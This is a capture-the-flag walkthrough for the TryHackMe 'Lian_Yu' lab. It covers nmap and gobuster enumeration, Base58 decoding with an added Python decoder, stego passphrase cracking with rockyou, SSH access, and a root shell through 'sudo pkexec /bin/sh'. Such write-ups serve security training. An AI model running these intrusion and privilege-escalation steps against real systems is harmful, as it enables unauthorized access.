Step 1 : Connect to TryHackMe and start the target machine
1. Connect to the TryHackMe network with the OpenVPN configuration file downloaded from your TryHackMe profile:
sudo openvpn /pathtoOVPNfile.ovpn
2. Start the machine in the 'Lian_Yu' room. The target IP address is displayed after about a minute.
Step 2 : Information gathering using Nmap and gobuster
1. Start an nmap scan of the target IP (-A already enables OS detection together with version detection, default scripts and traceroute, so -O adds nothing here but is harmless):
nmap -A -O <target ip>
Open ports:
21 - ftp (vsftpd 3.0.2)
22 - ssh
80 - http (Apache)
111 - rpcbind (versions 2-4)
2. Accessing the open ports, starting with the web server on port 80 in a browser:
3. Using gobuster for directory enumeration (brute-forcing paths from a wordlist; this is not directory traversal, which is a path-escape vulnerability):
gobuster dir -u http://10.10.97.179/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
4. Navigating to the directory found (/island) and viewing the page source (Ctrl+U in the browser), which holds the first hint:
5. Enumerating further with gobuster, this time under /island/:
gobuster dir -u http://10.10.97.179/island/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
6. Navigating to the newly found folder: its page source mentions a hidden ".<extension>". gobuster's -x flag appends an extension to every wordlist entry, so what is hidden here is a file with that extension rather than another folder.
7. Using gobuster with the -x flag to find the hidden file:
gobuster dir -u http://10.10.97.179/island/2100/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x <extension>
8. Navigating to the hidden file reveals a hint: a short string which, as a web search shows, is Base58-encoded (the 58-character Bitcoin alphabet, which leaves out 0, O, I and l) and decodes to a password.
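The Base58 decoding in step 8, as an added example that is not part of the original walkthrough: a small Base58 (Bitcoin alphabet) decoder and encoder in Python. The room's own hint string is not reproduced here; the vectors in the code are constructed public test values ("Hello World!" and a byte string with leading zero bytes). Leading '1' characters map to leading zero bytes, and characters outside the alphabet (0, O, I, l) are rejected rather than silently mangled, since a hint copied with a confusable character would otherwise decode to garbage.

```python
"""Base58 (Bitcoin alphabet) decoder/encoder.

Added example for the Base58 hint in step 8; not part of the original
walkthrough. The sample strings below are constructed public test vectors,
not the room's own hint.
"""
import sys

ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
INDEX = {c: i for i, c in enumerate(ALPHABET)}  # character -> digit value


def decode(text: str) -> bytes:
    """Decode a Base58 string to bytes.

    Base58 has no positional zero, so each leading '1' stands for one leading
    zero byte; those are counted separately and the whole string is otherwise
    read as a big-endian base-58 integer.
    """
    text = text.strip()
    if not text:
        return b""
    num = 0
    for ch in text:
        try:
            num = num * 58 + INDEX[ch]
        except KeyError:
            # 0, O, I and l are deliberately absent from the alphabet; refuse
            # anything outside it instead of producing a wrong password.
            raise ValueError(f"invalid Base58 character: {ch!r}") from None
    leading_zeros = len(text) - len(text.lstrip("1"))
    payload = num.to_bytes((num.bit_length() + 7) // 8, "big") if num else b""
    return b"\x00" * leading_zeros + payload


def encode(data: bytes) -> str:
    """Inverse of decode(); used here to verify round trips."""
    leading_zeros = len(data) - len(data.lstrip(b"\x00"))
    num = int.from_bytes(data, "big")
    digits = []
    while num:
        num, rem = divmod(num, 58)
        digits.append(ALPHABET[rem])
    return "1" * leading_zeros + "".join(reversed(digits))


def decode_hint(hint: str) -> str:
    """Decode a CTF-style hint for display: text when the result is printable
    UTF-8, otherwise hex, so binary output stays readable on a terminal."""
    raw = decode(hint)
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return raw.hex()
    return text if text.isprintable() else raw.hex()


if __name__ == "__main__":
    # Constructed sample used when no hint is given on the command line.
    for arg in sys.argv[1:] or ["2NEpo7TZRRrLZSi2U"]:
        print(f"{arg} -> {decode_hint(arg)}")
```

Run it with the hint string as an argument (python3 base58_hint.py <hint>); the decoded value is printed as text when printable, otherwise as hex. The same decoder covers any later Base58 hint in the room, not only this one.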
9. Logging in to the FTP service with the initial username (vigilante) and the Base58-decoded string as the password:
ftp <target ip>
10. Transferring the files found on the FTP server to the local machine. Browsing another folder on the server also reveals a second user's name, which is needed later for the SSH login.
11. Running StegCracker against every transferred image to brute-force the steghide passphrase with rockyou (StegCracker's own README now marks it deprecated in favour of the much faster stegseek, which accepts the same two arguments):
stegcracker <filename>.jpg /usr/share/wordlists/rockyou.txt
12. Using steghide with the recovered passphrase to extract the hidden file (-sf names the stego file; steghide prompts for the passphrase):
steghide --extract -sf <filename>.jpg
13. Unzipping the extracted archive reveals the shado file, which contains the password for the SSH login:
14. Logging in over SSH as the second user found during the FTP session, with the password from shado:
ssh <username>@<target ip>
15. After looking around the home directory, the user.txt flag is found.
16. Checking for privilege escalation by listing the commands this user may run through sudo:
sudo -l
17. Looking up the binary allowed by sudo -l on GTFOBins gives the following command, which spawns a shell as root:
sudo pkexec /bin/sh
18. Found root.txt
With these steps, I was able to answer all the questions posted in the Lian_Yu room on TryHackMe.